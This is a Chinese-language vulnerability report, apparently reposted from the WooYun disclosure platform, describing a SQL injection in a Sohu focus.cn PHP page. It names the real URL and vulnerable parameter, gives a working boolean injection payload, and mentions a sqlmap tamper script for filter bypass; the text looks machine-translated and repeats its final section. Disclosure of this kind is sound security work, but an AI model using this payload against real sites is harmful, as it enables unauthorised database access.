搜狐某站修复不当继续SQL注入
漏洞标题 搜狐某站修复不当继续SQL注入 相关厂商 搜狐 漏洞作者 Aasron 提交时间 2016-04-30 09:39 公开时间 2016-06-14 10:00 漏洞类型 SQL注射漏洞 危害…
漏洞标题
搜狐站修复不当继续SQL注入
相关制造商
搜狐
漏洞作者
Aasron
提交时间
2016-04-30 09: 39
公共时间
2016-06-14 10: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Php +字符型注入,注入技术,Mysql
漏洞详细信息
http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=
注射参数#kh
条件成立时
http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=-1'OR 3 * 2=6 AND 000498=000498或'7EorGOZw'='
当条件为假时
漏洞证明:
看着,过滤双引号等
Apostrophenullencode.py
修理计划:
继续过滤
版权声明:请注明出处Aasron @乌云
当条件为假时
漏洞证明:
看着,过滤双引号等
Apostrophenullencode.py
修理计划:
继续过滤
版权声明:请注明出处Aasron @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 513 )
- 分类:黑客技术
